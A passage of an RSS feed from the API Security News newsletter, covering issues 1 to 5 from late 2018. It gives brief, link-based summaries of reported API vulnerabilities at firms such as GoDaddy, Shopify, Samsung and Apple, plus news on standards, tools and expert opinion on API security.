2. DevSecOps helps a lot. The leaders in DevSecOps practices manage to reduce fix times up to 11.5 times faster than a traditional organization.</p>
<h4>Technology</h4>
<p><strong>OpenAPI Initiative</strong> turns 3! The <a href="https://www.openapis.org/">OpenAPI specification</a> is a Linux Foundation project. It has become the industry standard for API definitions, has gotten all the major players in the industry on board, and has enabled the whole ecosystem around APIs.</p>
<p>Craig Borysowich is doing a series of articles on <strong>API microservice security</strong> at <a href="https://it.toolbox.com/">Toolbox for IT,</a> covering all the aspects layer by layer. He has already posted overviews on <a href="https://it.toolbox.com/blogs/craigborysowich/api-microservice-security-ssl-layer-102518">SSL Layer</a>, <a href="https://it.toolbox.com/blogs/craigborysowich/api-microservice-security-pki-layer-102418">PKI Layer</a>, <a href="https://it.toolbox.com/blogs/craigborysowich/api-microservice-security-layer-identity-enforcement-102918">Identity Enforcement</a>, <a href="https://it.toolbox.com/blogs/craigborysowich/api-microservice-security-content-validation-layer-102918">Content Validation Layer</a>, and <a href="https://it.toolbox.com/blogs/craigborysowich/api-microservice-security-security-architecture-layer-103018">Security Architecture Layer</a>.</p>
<h4>Opinion</h4>
<p><a href="https://www.finextra.com/blogposting/16211/apitalism-3-deadly-sins-to-avoid-when-developing-and-using-banking-apis">API Security tips</a> from Tolga Tavlas, the author of &#8220;Digital Banking Tips&#8221;:</p>
<ul>
<li>Use HTTPS.</li>
<li>Only expose on your API what really needs to be exposed.</li>
<li>Educate your developers.</li>
<li>Do not trust API consumers.</li>
<li>Beware of the three most popular attack types: parameter attacks, identity attacks, and man-in-the-middle attacks.</li>
</ul>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-5-bad-tls-client-authentication-not-use-curl-state-software-security/">Issue 5: Bad TLS client authentication, how not to use cURL, State of Software Security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 4: Remini hacked, perils of free APIs, TLS explained, ATMs &#038; SWIFT get APIs</title>
		<link>https://apisecurity.io/issue-4-remini-and-twitter-counter-widget-hacked-tls-explained-atms-and-swift-get-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 01 Nov 2018 00:53:52 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5114</guid>

					<description><![CDATA[<p>Vulnerabilities Remini, a mobile app that schools use to communicate with parents, had kids&#8217; profiles including pictures, email addresses, phone numbers, and milestones accidentally publicly exposed through an API. No authentication was required, because developers assumed that only their mobile app knows that the API exists, and account IDs used were sequential, so hackers could simply [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-4-remini-and-twitter-counter-widget-hacked-tls-explained-atms-and-swift-get-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-4-remini-and-twitter-counter-widget-hacked-tls-explained-atms-and-swift-get-apis/">Issue 4: Remini hacked, perils of free APIs, TLS explained, ATMs &#038; SWIFT get APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p><strong>Remini</strong>, a mobile app that schools use to communicate with parents, had kids&#8217; profiles including pictures, email addresses, phone numbers, and milestones <a href="https://motherboard.vice.com/en_us/article/598xaa/remini-app-exposed-childrens-data-open-api">accidentally publicly exposed through an API</a>. No authentication was required, because developers assumed that only their mobile app knows that the API exists, and account IDs used were sequential, so hackers could simply iterate on them to get all the records.</p>
<p>A good <a href="https://www.bleepingcomputer.com/news/security/abandoned-tweet-counter-hijacked-with-malicious-script/">story on the <strong>perils of using free public APIs and scripts</strong></a>. Various sites embedded a Twitter counter script that was hosted by its creator in an AWS S3 bucket. The owner decided to discontinue the script and removed the S3 bucket. Hackers created a new S3 bucket with the exact same name, and all the sites that were still using the script ended up downloading and executing a new, malicious script on their pages.</p>
<h4>Technology Deep Dive</h4>
<p>A very cool <a href="https://tls.ulfheim.net/"><strong>TLS illustration and demo</strong></a> by Michael Driscoll shows and explains the TLS protocol step by step: how a client connects to a server, negotiates a TLS 1.2 session, sends a &#8220;ping&#8221;, receives a &#8220;pong&#8221;, and terminates the session.</p>
<h4>Tools</h4>
<p>Mobile app security vendor Data Theorem <a href="https://www.businesswire.com/news/home/20181025005215/en/Data-Theorem-Introduces-Industry%E2%80%99s-Automated-API-Discovery">is adding API discovery and security analysis tools</a>.</p>
<h4>Industry Standards</h4>
<p><strong>ATMs</strong> <a href="https://www.atmmarketplace.com/news/atmia-launches-next-gen-atm/">are also getting standardized APIs</a>: &#8220;The ATM Industry Association has launched the next-gen API app model for ATMs.&#8221; The industry install base is 3.2+ million ATMs, and the consortium includes 180+ global ATM companies. The site has the blueprint of the next generation architecture, but the actual API is not yet finalized and published.</p>
<p><a href="https://www.swift.com/news-events/press-releases/swift-creates-financial-sector-api-blueprint">A new whitepaper on APIs in financial industry</a> published by <strong>SWIFT</strong>, announcing plans to deliver a common API platform that includes identity management, financial crime compliance, reference data, global payments innovation (gpi), business intelligence, and API marketplace.</p>
<h4>Opinions</h4>
<p>An <a href="https://siliconangle.com/2018/10/22/apis-are-leaving-crypto-door-ajar-to-burglars-says-white-hat-hacker-hoshocon/">interview</a> with <strong>Anand Prakash</strong>, the founder of AppSecure and a bounty hunter that has found a lot of vulnerabilities in Facebook, Twitter, Uber, to name but a few. Lots of companies, including crypto exchanges, concentrate on protecting their UIs with passwords or two-factor authentication while forgetting to properly secure their APIs.</p>
<p>The post <a href="https://apisecurity.io/issue-4-remini-and-twitter-counter-widget-hacked-tls-explained-atms-and-swift-get-apis/">Issue 4: Remini hacked, perils of free APIs, TLS explained, ATMs &#038; SWIFT get APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 3: TLS 1.3, securing JWT, US banks release a common API standard</title>
		<link>https://apisecurity.io/issue-3-tls-1-3-securing-jwt-us-banks-release-common-api-standard/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 25 Oct 2018 00:25:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5100</guid>

					<description><![CDATA[<p>Vulnerabilities The Shopify vulnerability happened (and was fixed) back in May 2018. This week, Arif Khan goes into the details of the vulnerability and the lessons that we can learn from it for microservices and API security in general. In a nutshell, microservices themselves and the underlying cloud platform expand the attack surface. It is [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-3-tls-1-3-securing-jwt-us-banks-release-common-api-standard/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-3-tls-1-3-securing-jwt-us-banks-release-common-api-standard/">Issue 3: TLS 1.3, securing JWT, US banks release a common API standard</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p>The <strong>Shopify</strong> vulnerability happened (and was fixed) back in May 2018. This week, <a href="https://dzone.com/articles/bountytutorial-microservices-security-how-to-secur">Arif Khan goes into the details of the vulnerability</a> and the lessons that we can learn from it for microservices and API security in general. In a nutshell, microservices themselves and the underlying cloud platform expand the attack surface. It is no longer just the perimeter so you need API security, ideally on the microservice level, and to lock down the APIs and methods and data to the bare minimum that you really need.</p>
<p>One of the most popular content management systems (CMS) out there, <strong>Drupal</strong>, <a href="https://www.drupal.org/sa-core-2018-006">just released updates for versions 7.x and 8.x patching 5 vulnerabilities including 2 critical</a>. Vulnerabilities allow remote code execution because some of the APIs did not include proper input string validation.</p>
<p><strong>VestaCP</strong>, a popular open-source web hosting control panel, <a href="https://www.welivesecurity.com/2018/10/18/new-linux-chachaddos-malware-distributed-servers-vestacp-installed/">was hacked and used to launch DDoS attacks</a>. Most likely the software was hacked because its installation script contained Base64-encoded (and thus unencrypted) admin credentials and server URL.</p>
<h4>Financial industry</h4>
<p>Major US banks and fintechs, including Wells Fargo, Bank of America, Charles Schwab, Capital One, Chase, Fidelity, and Experian, formed the <a href="https://financialdataexchange.org/"><strong>Financial Data Exchange group</strong></a> to standardize the APIs for data exchange between banks, aggregators, and applications. They have already published their API at <a href="https://financialdataexchange.org/pages/dda">https://financialdataexchange.org/pages/dda</a>.</p>
<h4>Standards</h4>
<p>Chrome 70 <a href="https://www.zdnet.com/article/chrome-70-released-with-revamped-google-account-login-system/">released this week</a> includes the final version of the <strong>TLS 1.3</strong> standard and the updated <strong>Web Authentication API</strong> that gives authentication with the TouchID on macOS and the fingerprint sensor on Android.</p>
<h4>Analysts</h4>
<p>According to <strong>Gartner</strong>, <a href="https://www.gartner.com/doc/3834704/build-effective-api-security-strategy">by 2022 APIs will become the most common attack vector</a> (access to the full report requires subscription or one-time purchase).</p>
<h4>Technology deep dive</h4>
<p>Seba Peyrott from Auth0 <a href="https://auth0.com/blog/a-look-at-the-latest-draft-for-jwt-bcp/">published a brilliant overview</a> of the most common <strong>JWT attacks and the ways to mitigate them</strong>.</p>
<h4>Opinions</h4>
<p><strong>Fernando Serto from Akamai</strong> <a href="https://backendnews.net/2018/10/23/online-shoppers-are-susceptible-to-credential-stuffing/">talks</a> about (among many other fascinating things like protection against bots and distributed password hacking) how the transition from websites to mobile apps makes APIs the primary means of access, so the traditional web app security no longer helps. Instead, we need API-specific authentication, authorization, and analytics.</p>
<p>The post <a href="https://apisecurity.io/issue-3-tls-1-3-securing-jwt-us-banks-release-common-api-standard/">Issue 3: TLS 1.3, securing JWT, US banks release a common API standard</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 2: California IoT security law, GoDaddy &#038; AWS vulnerabilities</title>
		<link>https://apisecurity.io/issue-2-california-iot-security-law-godaddy-aws-vulnerabilities/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 18 Oct 2018 01:16:15 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5090</guid>

					<description><![CDATA[<p>Vulnerabilities GoDaddy 2-step authentication API found to be vulnerable.  The API lacks rate limiting and does not impose timeouts after failed second factor attempts. This opens doors for brute force attacks on the second factor. AWS Honeytokens designed by Amazon to help security specialist attract attackers and detect attacks turned out to actually be discoverable. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-2-california-iot-security-law-godaddy-aws-vulnerabilities/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-2-california-iot-security-law-godaddy-aws-vulnerabilities/">Issue 2: California IoT security law, GoDaddy &amp; AWS vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p><a href="https://medium.com/@yenthanh/how-did-i-hack-godaddy-2-step-authentication-of-my-own-account-7be78b171be7"><strong>GoDaddy</strong> 2-step authentication API</a> found to be vulnerable.  The API lacks rate limiting and does not impose timeouts after failed second factor attempts. This opens doors for brute force attacks on the second factor.</p>
<p><a href="https://www.wired.com/story/aws-honeytoken-hackers-avoid/"><strong>AWS</strong> Honeytokens</a> designed by Amazon to help security specialist attract attackers and detect attacks turned out to actually be discoverable. The vulnerability is a combination of two factors. Certain failed AWS queries produce verbose error messages that include Amazon Resource Name and thus information that this is a honeytoken. To make things worse, not all AWS services are covered with CloudTrail logging and thus hackers can use the intentional error queries against these services to check whether what they found is a honeytoken and do so without being detected.</p>
<h4>Legal / Compliance</h4>
<p><strong>State of California</strong> Senate and Assembly passed new <a href="https://www.natlawreview.com/article/california-poised-to-enact-internet-things-information-security-law">legislation on IoT security and APIs exposed by smart devices</a>. The law requires devices to have authentication and features to protect the device and any information contained on it from unauthorized access, destruction, use, modification, or disclosure. It takes effect on January 1, 2020.</p>
<h4>Opinions</h4>
<p><strong>Keith Casey from Okta</strong> talks about <a href="https://securitybrief.eu/story/exclusive-cybersecurity-in-the-api-economy">Cybersecurity in API Economy</a>. He posits that the 3 basic pillars of API security are:</p>
<ul>
<li>What: We expose only the interfaces we intend</li>
<li>How much: We share and accept only the data we intend</li>
<li>With whom: We grant access only to the people or systems we intend</li>
</ul>
<p>Then looks into how API gateways and OAuth can help.</p>
<p><strong>Jason Macy from Forum Systems</strong> <a href="https://www.itproportal.com/features/public-cloud-api-security-how-safe-is-our-data/">argues</a> APIs need to be secure by design by including:</p>
<ol>
<li>Centralized identity management,</li>
<li>Real-time monitoring &amp; security enforcement,</li>
<li>Seamless cloud integration.</li>
</ol>
<p><strong>Shahid Mansuri</strong> <a href="https://jaxenter.com/security-measures-protect-iot-devices-150550.html">writes about API Security in Internet of Things (IoT)</a>: &#8220;API security will be critical for defending the integrity of data transiting between IoT devices and backend software infra to make sure that only sanctioned devices, certified developers, and trustworthy apps are collaborating with APIs as well as spotting possible threats and attacks against particular APIs.&#8221;</p>
<h4>Community</h4>
<p><a href="https://www.linkedin.com/groups/12148519/"><strong>API Security LinkedIn group</strong></a> launched. Join to read and submit API security-related news and opinions.</p>
<p>The post <a href="https://apisecurity.io/issue-2-california-iot-security-law-godaddy-aws-vulnerabilities/">Issue 2: California IoT security law, GoDaddy &amp; AWS vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 1: APIStrat, CORS, Samsung, Google, Facebook, GitLab, Apple</title>
		<link>https://apisecurity.io/issue-1-apistrat-cors-samsung-google-facebook-gitlab-apple/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 11 Oct 2018 21:14:21 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5043</guid>

					<description><![CDATA[<p>API Vulnerabilities Samsung smart TV security flaw: the equipment would basically accept commands from any source, so someone knowing the device ID would be able to invoke various functions remotely. API allowed hackers to &#8220;change TV channels, turn up the volume, play unwanted YouTube videos, or kick the TV off a WiFi connection&#8221;. Firmware update [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-1-apistrat-cors-samsung-google-facebook-gitlab-apple/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-1-apistrat-cors-samsung-google-facebook-gitlab-apple/">Issue 1: APIStrat, CORS, Samsung, Google, Facebook, GitLab, Apple</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>API Vulnerabilities</h4>
<p><a href="https://www.consumerreports.org/tvs/samsung-fixes-smart-tv-security-issue/">Samsung smart TV security flaw</a>: the equipment would basically accept commands from any source, so someone knowing the device ID would be able to invoke various functions remotely. API allowed hackers to &#8220;change TV channels, turn up the volume, play unwanted YouTube videos, or kick the TV off a WiFi connection&#8221;. Firmware update for 2018 models is out fixes that by limiting calls to Samsung servers only. Fix for 2017 models is on the way.</p>
<p><a href="https://www.theverge.com/2018/10/8/17951914/google-plus-data-breach-exposed-user-profile-information-privacy-not-disclosed">Google</a>: is shutting down Google+ service following security flaw in Google+ APIs that exposed private user information.</p>
<p><a href="https://medium.facilelogin.com/what-went-wrong-d09b0dc24de4">Facebook</a>: details by Prabath on how a custom OAuth implementation led to the massive breach.</p>
<p><a href="https://devclass.com/2018/10/02/gitlab-api-flaw-security-updates/">GitLab</a>: private events (confidential issues, private merge requests, private milestones and more) were exposed via the API and were just filtered out by the UI.</p>
<p><a href="https://9to5mac.com/2018/09/27/apple-dep-security-vulnerability/">Apple</a>: vulnerabilities in Apple&#8217;s device enrollment API: authentication is optional, there is no rate limiting (opening to a brute force attack), serial numbers are predictable.</p>
<h4>Conference Talks</h4>
<p><a href="https://www.slideshare.net/42crunch/advanced-api-security-patterns">APIStrat &#8220;Advanced API Security Patterns&#8221;:</a> session slides published by the speaker, Isabelle Mauny.</p>
<h4>Technology Overview</h4>
<p><a href="http://performantcode.com/web/do-you-really-know-cors">Cross-Origin Resource Sharing (CORS)</a>: Great overview of the technology by Grzegorz Mirek.</p>
<h4>Surveys</h4>
<p><a href="https://www.computerweekly.com/news/252449925/Majority-of-businesses-believe-they-are-open-to-cyber-attack">Radware / Merrill Research:</a> According to the second annual State of web application security report (commissioned by security firm Radware and based on a survey of more than 300 executives and IT professionals at global companies by Merrill Research): &#8220;with 82% of organisations that use API gateways doing so to share and/or consume data, but 70% of respondents do not require authentication from third-party APIs, 62% do not encrypt data sent by APIs, and 33% allow third parties to perform actions, opening the door to additional threats.&#8221;</p>
<p>The post <a href="https://apisecurity.io/issue-1-apistrat-cors-samsung-google-facebook-gitlab-apple/">Issue 1: APIStrat, CORS, Samsung, Google, Facebook, GitLab, Apple</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
